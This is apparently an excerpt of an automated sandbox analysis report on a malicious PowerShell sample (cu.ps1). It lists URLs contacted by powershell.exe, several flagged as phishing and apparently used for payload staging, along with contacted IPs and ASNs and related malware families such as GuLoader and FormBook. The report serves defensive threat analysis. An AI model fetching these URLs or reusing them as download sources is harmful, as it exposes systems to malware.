                            http://www.pineappletech.aepowershell.exe, 00000000.00000002.1669645213.0000022A14B84000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.fornid.com/133-occhiali-protettivipowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.erp-royal-crown.ipowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.fornid.com/themes/PRS070158/css/megnor/custom.csspowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1669645213.0000022A12C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530508582.000002A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EA31000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.almrwad.com/wh/Subordinpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.erp-royal-crown.info/wh/powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              		unknown
                              https://www.fornid.com/wh/List%20of%20rznvquirznvd%20itznvms%20and%20sznvrvicznvs.pdfpowershell.exe, 00000000.00000002.1669645213.0000022A14252000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.erp-royal-crown.info/wh/Subordinerendes78.smippowershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520341000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              		unknown
                              https://www.almrwad.com/wh/Subordinerendes7powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.almrwad.com/wh/Subordpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.fornid.com/contattacipowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.almrwad.com/wh/powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.almrwad.com/wh/Subordinerendespowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://go.micropowershell.exe, 00000000.00000002.1669645213.0000022A13852000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530508582.000002A601625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530508582.000002A60090A000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://contoso.com/Iconpowershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.almrwad.compowershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FCD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.fornid.compowershell.exe, 00000000.00000002.1669645213.0000022A14252000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A14706000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.almrwad.com/wh/Subordinerendepowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.almrwad.com/wh/Subordinerendes78.spowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.jspowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.almrwad.com/wh/Subordinerendes78.smpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fornid.com/powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://almrwad.compowershell.exe, 00000007.00000002.2653474547.000002251FAEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FDD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FCD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.fornid.com/144-filtri-per-mascherepowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1472C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.almrwad.com/wh/Subordinerendes78powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.erp-royal-crown.info/wh/Subordpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: phishing
                                            		unknown
                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1472C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.erp-royal-crown.info/wpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              https://www.erp-royal-crown.powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://fornid.compowershell.exe, 00000000.00000002.1669645213.0000022A1470B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.erp-royal-crown.info/wh/Subordinerepowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              https://www.erp-royal-crown.info/whpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              https://www.fornid.com/sitemappowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoropowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.fornid.com/145-maschere-antigaspowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1472C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://contoso.com/Licensepowershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.almrwad.com/wh/Subordinerendpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.erp-royal-crown.info/wh/Subordipowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                https://www.erp-royal-crown.info/wh/Suborpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                https://www.fornid.com/il-mio-accountpowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.erp-royal-crown.info/wh/Subopowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                http://www.almrwad.compowershell.exe, 00000007.00000002.2653474547.000002251FAEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FDD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FCD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.almrwad.com/wh/Subordinerepowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.erp-royal-crown.inpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://go.microspowershell.exe, 00000003.00000002.1530508582.000002A60090A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.almrwad.com/wh/Subordipowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.almrwad.copowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.almrwad.com/wh/Subordinerendes78.powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://erp-royal-crown.infopowershell.exe, 00000007.00000002.2653474547.000002251FCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FC05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FEF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F9B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: phishing
                                                  		unknown
                                                  https://www.erp-royal-crown.info/wh/Subordinerendespowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: phishing
                                                  		unknown
                                                  https://contoso.com/powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.pinznvapplznvtznvch.aznv/na/mg.vbspowershell.exe, 00000000.00000002.1669645213.0000022A14AA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.erp-royal-crown.info/wh/Subordinerendes78.spowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: phishing
                                                    		unknown
                                                    https://www.fornid.com/img/logo.jpgpowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.almrwad.com/whpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.almrwad.com/wh/Subpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.erp-royal-crown.info/wh/Subordinpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: phishing
                                                    		unknown
                                                    https://www.almrwad.com/wh/Subopowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://blog.fornid.com/powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1729316042.0000022A22C8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1729316042.0000022A22DD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1547285590.000002A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EA9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.erp-royal-crown.info/wh/Subordinerendes78powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: phishing
                                                      		unknown
                                                      http://www.fornid.com/content/13-international-shipmentspowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.almrwad.com/wh/Suborpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.almrwad.powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000003.00000002.1530508582.000002A601625000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.jspowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.erp-royal-crown.info/wh/Su0powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          		unknown
                                                          https://www.erp-royal-crown.info/wh/Subordinerendes7powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          		unknown
                                                          http://www.fornid.compowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1470B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.fornid.com/cercapowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.erp-royal-crown.info/powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          		unknown
                                                          https://www.almrwad.com/wh/Subordinerenpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          91.193.42.13
                                                          		www.pineappletech.aeBelgium
                                                          		48694ITFPLfalse
                                                          93.95.216.175
                                                          		fornid.comItaly
                                                          		52030SERVERPLAN-ASITtrue
                                                          148.251.114.233
                                                          		erp-royal-crown.infoGermany
                                                          		24940HETZNER-ASDEfalse
                                                          184.171.244.231
                                                          		almrwad.comUnited States
                                                          		33182DIMENOCUSfalse

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1568998
                                                          Start date and time:2024-12-05 10:38:10 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 6m 19s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:15
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:cu.ps1
                                                          Detection:MAL
                                                          Classification:mal100.expl.evad.winPS1@11/13@4/4
                                                          EGA Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 15
                                                          • Number of non-executed functions: 3
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .ps1

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 7372 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 7584 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 8008 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: cu.ps1

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          04:39:10API Interceptor1519804x Sleep call for process: powershell.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          91.193.42.13ni.ps1Get hashmaliciousUnknownBrowse
                                                            qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                              List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                93.95.216.175ni.ps1Get hashmaliciousUnknownBrowse
                                                                  148.251.114.233PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/30vc/
                                                                  PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/30vc/
                                                                  PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/fchs/
                                                                  PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/30vc/
                                                                  PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/30vc/
                                                                  PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/30vc/
                                                                  184.171.244.231ni.ps1Get hashmaliciousUnknownBrowse
                                                                    qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                      yd2.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                        List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          www.pineappletech.aeni.ps1Get hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                          • 91.193.42.13
                                                                          List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                          • 91.193.42.13

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          ITFPLni.ps1Get hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                          • 91.193.42.13
                                                                          List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                          • 91.193.42.13
                                                                          KgQJ0dIs3A.exeGet hashmaliciousAmadey, zgRATBrowse
                                                                          • 91.193.43.180
                                                                          7GC8osUQMq.exeGet hashmaliciousAmadeyBrowse
                                                                          • 91.193.43.180
                                                                          Y3KkfxEZuo.exeGet hashmaliciouszgRATBrowse
                                                                          • 91.193.43.180
                                                                          wqb7dL448k.exeGet hashmaliciousAmadey, Xmrig, zgRATBrowse
                                                                          • 91.193.43.180
                                                                          Oupxwi.jsGet hashmaliciousQbotBrowse
                                                                          • 91.193.43.119
                                                                          Nyyne.jsGet hashmaliciousQbotBrowse
                                                                          • 91.193.43.119
                                                                          Nyyne.jsGet hashmaliciousUnknownBrowse
                                                                          • 91.193.43.119
                                                                          HETZNER-ASDEni.ps1Get hashmaliciousUnknownBrowse
                                                                          • 148.251.114.233
                                                                          UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                          • 88.99.61.52
                                                                          https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#CGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                          • 5.9.227.67
                                                                          Ttok18.exeGet hashmaliciousVidarBrowse
                                                                          • 159.69.102.165
                                                                          jtkhikadjthsad.exeGet hashmaliciousVidarBrowse
                                                                          • 159.69.102.165
                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                          • 159.69.102.165
                                                                          rukT6hBo6P.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                          • 49.12.121.47
                                                                          o26qobnkQI.exeGet hashmaliciousVidarBrowse
                                                                          • 159.69.102.165
                                                                          https://ammyy.com/en/downloads.htmlGet hashmaliciousFlawedammyyBrowse
                                                                          • 136.243.18.118
                                                                          Advertising Agreement for Youtube Cooperation.scrGet hashmaliciousLummaC StealerBrowse
                                                                          • 148.251.0.164
                                                                          SERVERPLAN-ASITni.ps1Get hashmaliciousUnknownBrowse
                                                                          • 93.95.216.175
                                                                          untrippingvT.ps1Get hashmaliciousUnknownBrowse
                                                                          • 46.254.34.201
                                                                          yT6gJFN0SR.lnkGet hashmaliciousUnknownBrowse
                                                                          • 46.254.34.201
                                                                          mX3IqRiuFo.lnkGet hashmaliciousUnknownBrowse
                                                                          • 46.254.34.201
                                                                          6K2g0GMmIE.lnkGet hashmaliciousUnknownBrowse
                                                                          • 46.254.34.201
                                                                          G9eWTvswoH.lnkGet hashmaliciousUnknownBrowse
                                                                          • 46.254.34.201
                                                                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                          • 193.70.147.14
                                                                          Ordine Electricas BC Corp PO EDC0969388.batGet hashmaliciousGuLoaderBrowse
                                                                          • 185.81.4.143
                                                                          Play_VM-Now(Gdunphy)CQDM.htmGet hashmaliciousUnknownBrowse
                                                                          • 93.95.216.8
                                                                          Steel Dynamics.pdfGet hashmaliciousUnknownBrowse
                                                                          • 93.95.216.8

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          3b5074b1b5d032e5620f69f9f700ff0eni.ps1Get hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          31#U544a.exeGet hashmaliciousCobaltStrikeBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          R7bv9d6gTH.dllGet hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          Patch.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          RuntimeBroker.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                          • 91.193.42.13
